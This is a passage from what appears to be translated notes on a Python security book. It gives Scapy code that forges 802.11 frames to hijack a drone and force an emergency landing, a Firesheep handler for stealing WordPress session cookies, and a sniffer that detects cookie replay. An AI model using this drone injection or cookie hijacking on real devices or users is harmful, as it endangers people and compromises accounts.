        <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
        <span class="c1"># Take the sequence number after "=" and stay a few steps ahead of the phone</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">raw</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">","</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="o">+</span> <span class="mi">5</span>
        <span class="k">except</span> <span class="nb">ValueError</span><span class="p">:</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span>
</code></pre></div></div>

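<h3 id="用-scapy-制作-80211-数据帧">Crafting 802.11 Frames with Scapy</h3>

<p>Next we forge a packet containing a drone command. To do so we copy the necessary information from the current packet or frame, which passes through the RadioTap, 802.11, LLC, SNAP, IP, and UDP layers.</p>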

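<p>We write a complete library that copies the information in each layer. Note that some fields in each layer are deliberately skipped. For example, the field holding the IP packet length is not copied, so that Scapy computes its value automatically. Likewise, the fields that store checksums are not copied.</p>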
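<p>Why the length and checksum fields are better left for Scapy to recompute can be seen from the arithmetic itself. The sketch below is an illustration only, not part of the library: it computes the standard Internet checksum (RFC 1071) over a sample IPv4 header in plain Python. The helper name <code class="language-plaintext highlighter-rouge">ipv4_checksum</code> and the sample header bytes are assumptions made for the example.</p>

```python
def ipv4_checksum(header):
    """Internet checksum (RFC 1071) over an even-length header whose checksum field is zeroed."""
    total = 0
    for i in range(0, len(header), 2):
        total += int.from_bytes(header[i:i + 2], "big")   # sum the 16-bit words
    while total // 0x10000:
        total = total % 0x10000 + total // 0x10000        # fold the carries back in
    return 0xFFFF - total                                  # one's complement of the sum


# A 20-byte IPv4 header with the checksum bytes (offsets 10 and 11) set to zero.
header = bytes.fromhex("450000730000400040110000c0a80001c0a800c7")
print(hex(ipv4_checksum(header)))

# Changing the total-length field (bytes 2 and 3) changes the checksum, so a copied
# checksum would no longer match a packet that carries a different payload.
longer = header[:2] + (0x0080).to_bytes(2, "big") + header[4:]
print(hex(ipv4_checksum(longer)))
```

<p>Because the injected command has a different length from the captured one, both the length and the checksum of the copied packet would be stale, which is why the duplication functions leave those fields unset.</p>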

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">dup_radio</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">r_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">RadioTap</span><span class="p">)</span>
    <span class="n">version</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">version</span>
    <span class="n">pad</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">pad</span>
    <span class="n">present</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">present</span>
    <span class="n">notdecoded</span> <span class="o">=</span> <span class="n">r_pkt</span><span class="p">.</span><span class="n">notdecoded</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">RadioTap</span><span class="p">(</span><span class="n">version</span><span class="o">=</span><span class="n">version</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">present</span><span class="o">=</span><span class="n">present</span><span class="p">,</span> <span class="n">notdecoded</span><span class="o">=</span><span class="n">notdecoded</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_dot11</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
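    <span class="n">d_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">)</span>
    <span class="n">subtype</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">subtype</span>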
    <span class="n">copy_type</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="nb">type</span>
    <span class="n">proto</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">proto</span>
    <span class="n">fc_field</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">FCfield</span>
    <span class="n">copy_id</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">ID</span>
    <span class="n">addr1</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr1</span>
    <span class="n">addr2</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr2</span>
    <span class="n">addr3</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr3</span>
    <span class="n">sc</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">SC</span>
    <span class="n">addr4</span> <span class="o">=</span> <span class="n">d_pkt</span><span class="p">.</span><span class="n">addr4</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">Dot11</span><span class="p">(</span><span class="n">subtype</span><span class="o">=</span><span class="n">subtype</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">copy_type</span><span class="p">,</span> <span class="n">proto</span><span class="o">=</span><span class="n">proto</span><span class="p">,</span> <span class="n">fc_field</span><span class="o">=</span><span class="p">...)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_snap</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">s_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">SNAP</span><span class="p">)</span>
    <span class="n">oui</span> <span class="o">=</span> <span class="n">s_pkt</span><span class="p">.</span><span class="n">OUI</span>
    <span class="n">code</span> <span class="o">=</span> <span class="n">s_pkt</span><span class="p">.</span><span class="n">code</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">SNAP</span><span class="p">(</span><span class="n">OUI</span><span class="o">=</span><span class="n">oui</span><span class="p">,</span> <span class="n">code</span><span class="o">=</span><span class="n">code</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_llc</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">l_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">LLC</span><span class="p">)</span>
    <span class="n">dsap</span> <span class="o">=</span> <span class="n">l_pkt</span><span class="p">.</span><span class="n">dsap</span>
    <span class="n">ssap</span> <span class="o">=</span> <span class="n">l_pkt</span><span class="p">.</span><span class="n">ssap</span>
    <span class="n">ctrl</span> <span class="o">=</span> <span class="n">l_pkt</span><span class="p">.</span><span class="n">ctrl</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">LLC</span><span class="p">(</span><span class="n">dsap</span><span class="o">=</span><span class="n">dsap</span><span class="p">,</span> <span class="n">ssap</span><span class="o">=</span><span class="n">ssap</span><span class="p">,</span> <span class="n">ctrl</span><span class="o">=</span><span class="n">ctrl</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_ip</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">i_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">)</span>
    <span class="n">version</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">version</span>
    <span class="n">tos</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">tos</span>
    <span class="n">copy_id</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="nb">id</span>
    <span class="n">flags</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">flags</span>
    <span class="n">ttl</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">ttl</span>
    <span class="n">proto</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">proto</span>
    <span class="n">src</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">src</span>
    <span class="n">dst</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">dst</span>
    <span class="n">options</span> <span class="o">=</span> <span class="n">i_pkt</span><span class="p">.</span><span class="n">options</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">IP</span><span class="p">(</span><span class="n">version</span><span class="o">=</span><span class="n">version</span><span class="p">,</span> <span class="nb">id</span><span class="o">=</span><span class="n">copy_id</span><span class="p">,</span> <span class="p">...)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>

<span class="k">def</span> <span class="nf">dup_udp</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">u_pkt</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">)</span>
    <span class="n">sport</span> <span class="o">=</span> <span class="n">u_pkt</span><span class="p">.</span><span class="n">sport</span>
    <span class="n">dport</span> <span class="o">=</span> <span class="n">u_pkt</span><span class="p">.</span><span class="n">dport</span>
    <span class="n">n_pkt</span> <span class="o">=</span> <span class="n">UDP</span><span class="p">(</span><span class="n">sport</span><span class="o">=</span><span class="n">sport</span><span class="p">,</span> <span class="n">dport</span><span class="o">=</span><span class="n">dport</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">n_pkt</span>
</code></pre></div></div>

<p>Next, put the pieces together:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">inject_cmd</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">radio</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_radio</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">dot11</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_dot11</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">snap</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_snap</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">llc</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_llc</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">ip</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_ip</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">udp</span> <span class="o">=</span> <span class="n">dup</span><span class="p">.</span><span class="n">dup_udp</span><span class="p">(</span><span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span><span class="p">)</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">Raw</span><span class="p">(</span><span class="n">load</span><span class="o">=</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">inject_pkt</span> <span class="o">=</span> <span class="n">radio</span> <span class="o">/</span> <span class="n">dot11</span> <span class="o">/</span> <span class="n">llc</span> <span class="o">/</span> <span class="n">snap</span> <span class="o">/</span> <span class="n">ip</span> <span class="o">/</span> <span class="n">udp</span> <span class="o">/</span> <span class="n">raw</span>
    <span class="n">sendp</span><span class="p">(</span><span class="n">inject_pkt</span><span class="p">)</span>
</code></pre></div></div>

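<p>The emergency-landing command is one of the most important commands for controlling the drone: it forces the drone to shut off its engines and come down immediately. To issue it, use a sequence number equal to the current sequence number plus 100. Then send the command <code class="language-plaintext highlighter-rouge">AT*COMWDG=$SEQ\r</code>, which resets the communication counter to our newly chosen sequence value. After that the drone ignores earlier commands and commands whose sequence numbers do not match. Finally, send the emergency-landing command.</p>

<h3 id="完成攻击使无人机紧急迫降">Completing the Attack: Forcing an Emergency Landing</h3>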

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">emergency_land</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="n">spoof_seq</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">+</span> <span class="mi">100</span>
    <span class="n">watch</span> <span class="o">=</span> <span class="s">"AT*COMWDG={}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span><span class="p">)</span>
    <span class="n">to_cmd</span> <span class="o">=</span> <span class="s">"AT*REF={},{}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">EMER</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">watch</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">to_cmd</span><span class="p">)</span>
    
<span class="k">def</span> <span class="nf">take_off</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="n">spoof_seq</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">+</span> <span class="mi">100</span>
    <span class="n">watch</span> <span class="o">=</span> <span class="s">"AT*COMWDG={}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span><span class="p">)</span>
    <span class="n">to_cmd</span> <span class="o">=</span> <span class="s">"AT*REF={},{}</span><span class="se">\r</span><span class="s">"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spoof_seq</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">TAKEOFF</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">watch</span><span class="p">)</span>
    <span class="bp">self</span><span class="p">.</span><span class="n">inject_cmd</span><span class="p">(</span><span class="n">to_cmd</span><span class="p">)</span>
</code></pre></div></div>
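<p>The two methods above rely on the constants <code class="language-plaintext highlighter-rouge">EMER</code> and <code class="language-plaintext highlighter-rouge">TAKEOFF</code>, which these notes do not define. The sketch below shows one way they might be derived and how the command pair is assembled. It is an assumption-laden illustration: the bit layout of the <code class="language-plaintext highlighter-rouge">AT*REF</code> argument is recalled from the AR.Drone developer guide rather than taken from the text above, and the helper <code class="language-plaintext highlighter-rouge">build_override</code> is hypothetical.</p>

```python
# Assumption: bit layout recalled from the AR.Drone developer guide, not from the notes above.
REF_BASE = sum(2 ** bit for bit in (18, 20, 22, 24, 28))   # bits that are always set
TAKEOFF = REF_BASE + 2 ** 9    # bit 9 set: take off
EMER = REF_BASE + 2 ** 8       # bit 8 set: emergency stop


def build_override(seq, ref_value, jump=100):
    """Return the two AT commands that take over the session, in send order."""
    spoof_seq = seq + jump
    watchdog = "AT*COMWDG={}\r".format(spoof_seq)                  # reset the counter first
    command = "AT*REF={},{}\r".format(spoof_seq + 1, ref_value)    # then the actual order
    return [watchdog, command]


print(EMER, TAKEOFF)
print(build_override(7, EMER))
```

<p>Keeping the string construction in one helper removes the duplication between <code class="language-plaintext highlighter-rouge">emergency_land</code> and <code class="language-plaintext highlighter-rouge">take_off</code>, and lets the command text be checked without a drone or a wireless card.</p>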

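<h2 id="探测火绵羊">Detecting Firesheep</h2>

<p>A tool called Firesheep provides a simple double-click interface for remotely taking over the accounts of unsuspecting users on Facebook, Twitter, Google, and many other social media sites. Firesheep passively listens on the wireless card for cookies issued by these web sites. If a user is connected to an insecure wireless network and the session is not protected by a server-side control such as HTTPS, Firesheep captures the cookies so the attacker can reuse them.</p>

<p>To capture and replay the cookies of a particular session, Firesheep also offers an easy-to-use interface for writing custom handlers. The following handler targets WordPress cookies:</p>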

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">register</span><span class="p">({</span>
  <span class="na">name</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Wordpress</span><span class="dl">"</span><span class="p">,</span>
  <span class="na">matchPacket</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span><span class="nx">packet</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">cookieName</span> <span class="k">in</span> <span class="nx">packet</span><span class="p">.</span><span class="nx">cookies</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if</span> <span class="p">(</span><span class="nx">cookieName</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/^wordpress_</span><span class="se">[</span><span class="sr">0-9a-fA-F</span><span class="se">]{32}</span><span class="sr">$/</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">return</span> <span class="kc">true</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">},</span>
  
  <span class="na">processPacket</span><span class="p">:</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">siteUrl</span> <span class="o">+=</span> <span class="dl">"</span><span class="s2">wp-admin/</span><span class="dl">"</span>
    <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">cookieName</span> <span class="k">in</span> <span class="k">this</span><span class="p">.</span><span class="nx">firstPacket</span><span class="p">.</span><span class="nx">cookies</span><span class="p">)</span> <span class="p">{</span>
      <span class="k">if</span> <span class="p">(</span><span class="nx">cookieName</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/^wordpress_</span><span class="se">[</span><span class="sr">0-9a-fA-F</span><span class="se">]{32}</span><span class="sr">$/</span><span class="p">))</span> <span class="p">{</span>
        <span class="k">this</span><span class="p">.</span><span class="nx">sessionId</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">firstPacket</span><span class="p">.</span><span class="nx">cookies</span><span class="p">[</span><span class="nx">cookieName</span><span class="p">];</span>
        <span class="k">break</span><span class="p">;</span>
      <span class="p">}</span>
    <span class="p">}</span>
  <span class="p">},</span>
    
  <span class="na">identifyUser</span><span class="p">:</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
    <span class="kd">var</span> <span class="nx">resp</span> <span class="o">=</span> <span class="k">this</span><span class="p">.</span><span class="nx">httpGet</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">siteUrl</span><span class="p">);</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">userName</span> <span class="o">=</span> <span class="nx">resp</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">querySelectorAll</span><span class="p">(</span><span class="dl">"</span><span class="s2">#user_info a</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nx">textContent</span><span class="p">;</span>
    <span class="k">this</span><span class="p">.</span><span class="nx">siteName</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Wordpress (</span><span class="dl">"</span> <span class="o">+</span> <span class="k">this</span><span class="p">.</span><span class="nx">firstPacket</span><span class="p">.</span><span class="nx">host</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">)</span><span class="dl">"</span><span class="p">;</span>
  <span class="p">}</span>
<span class="p">});</span>
</code></pre></div></div>

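<h3 id="理解-wordpress-的会话-cookies">Understanding WordPress Session Cookies</h3>

<p>An attacker running the Firesheep toolkit on Firefox 3.6.24 can see such cookie strings being sent unencrypted over the wireless network.</p>

<h3 id="牧羊人找出-wordpress-cookie-重放攻击">The Shepherd: Catching WordPress Cookie Replay Attacks</h3>

<p>Write a Python script that parses WordPress HTTP sessions containing these session cookies.</p>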

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">fire_catcher</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">r</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"wordpress_[0-9a-fA-F]{32}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r</span> <span class="ow">and</span> <span class="s">"Set"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">raw</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"{}&gt;{} Cookie: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span><span class="p">,</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">dst</span><span class="p">,</span> <span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sniff</span><span class="p">(</span><span class="nb">filter</span><span class="o">=</span><span class="s">"tcp port 80"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">fire_catcher</span><span class="p">)</span>
</code></pre></div></div>
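<p>The matching rule in the script can be tried without a wireless card. This is a minimal sketch, assuming the payload has already been turned into text; the helper name <code class="language-plaintext highlighter-rouge">client_cookie</code> and the sample request and response are made up for illustration.</p>

```python
import re

COOKIE_RE = re.compile(r"wordpress_[0-9a-fA-F]{32}")


def client_cookie(raw):
    """Return the WordPress session cookie name in a client request, or None."""
    match = COOKIE_RE.search(raw)
    # Mirror the script's check: skip server responses that carry Set-Cookie.
    if match and "Set" not in raw:
        return match.group(0)
    return None


token = "wordpress_" + "0123456789abcdef" * 2   # made-up 32-hex-digit suffix
request = "GET /wp-admin/ HTTP/1.1\r\nCookie: {}=value\r\n\r\n".format(token)
response = "HTTP/1.1 200 OK\r\nSet-Cookie: {}=value\r\n\r\n".format(token)
print(client_cookie(request))
print(client_cookie(response))
```

<p>Note that the <code class="language-plaintext highlighter-rouge">"Set" not in raw</code> test is coarse: any request that happens to contain the text "Set" elsewhere is skipped as well. Matching on the <code class="language-plaintext highlighter-rouge">Set-Cookie:</code> header name would be stricter, at the cost of departing from the original script.</p>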

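<p>To catch an attacker using Firesheep, we need to confirm that the same cookie value is being reused from different IP addresses. To detect this, we modify the previous script:</p>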

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">cookie_table</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">def</span> <span class="nf">fire_catcher</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">r</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"wordpress_[0-9a-fA-F]{32}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r</span> <span class="ow">and</span> <span class="s">"Set"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">raw</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">cookie_table</span><span class="p">.</span><span class="n">keys</span><span class="p">():</span>
            <span class="n">cookie_table</span><span class="p">[</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]]</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected and indexed cookie."</span><span class="p">)</span>
        <span class="k">elif</span> <span class="n">cookie_table</span><span class="p">[</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]]</span> <span class="o">!=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Detected Conflict for {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"Victim = {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">cookie_table</span><span class="p">[</span><span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">]]))</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"Attacker = {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span><span class="p">))</span>
            
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -i&lt;interface&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-i"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"interface"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify interface to listen on"</span><span class="p">)</span>
    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="k">if</span> <span class="n">options</span><span class="p">.</span><span class="n">interface</span> <span class="o">==</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">interface</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">sniff</span><span class="p">(</span><span class="nb">filter</span><span class="o">=</span><span class="s">"tcp port 80"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">fire_catcher</span><span class="p">)</span>
    <span class="k">except</span> <span class="nb">KeyboardInterrupt</span><span class="p">:</span>
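        <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">main</span><span class="p">()</span>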
</code></pre></div></div>
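
<p>The conflict check itself does not depend on Scapy. The following is a minimal sketch of the same logic as a pure function, assuming the traffic has already been reduced to (source IP, payload text) pairs in capture order. The name <code class="language-plaintext highlighter-rouge">find_cookie_conflicts</code> and the sample addresses are hypothetical and only serve the illustration.</p>

```python
import re

# Same pattern the sniffer uses: "wordpress_" followed by 32 hex digits.
COOKIE_RE = re.compile(r"wordpress_[0-9a-fA-F]{32}")


def find_cookie_conflicts(observations):
    """Return (cookie, first_ip, other_ip) for cookies seen from two IPs.

    observations is an iterable of (src_ip, payload_text) pairs.
    """
    first_seen = {}
    conflicts = []
    for src_ip, payload in observations:
        if "Set" in payload:
            continue  # skip server responses (Set-Cookie), as the script does
        match = COOKIE_RE.search(payload)
        if not match:
            continue
        cookie = match.group(0)
        # Remember the first IP that presented this cookie.
        owner = first_seen.setdefault(cookie, src_ip)
        if owner != src_ip:
            conflicts.append((cookie, owner, src_ip))
    return conflicts


if __name__ == "__main__":
    cookie = "wordpress_" + "ab12" * 8
    sample = [
        ("192.168.1.10", "Cookie: " + cookie),
        ("192.168.1.66", "Cookie: " + cookie),
    ]
    for found, victim, attacker in find_cookie_conflicts(sample):
        print("[*] Conflict for {}: {} vs {}".format(found, victim, attacker))
```

<p>Keeping the check separate from the capture loop makes it possible to test against recorded payloads before running it on a live interface.</p>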

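<h3 id="用-python-搜寻蓝牙">Searching for Bluetooth with Python</h3>

<p>Interacting with Bluetooth resources requires the PyBluez Python module, which extends the functionality of the BlueZ library for working with Bluetooth resources. Calling <code class="language-plaintext highlighter-rouge">discover_devices()</code> returns a list of the MAC addresses of all nearby Bluetooth devices that are currently in "discoverable" mode. <code class="language-plaintext highlighter-rouge">lookup_name()</code> converts a device's MAC address into a human-readable name.</p>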

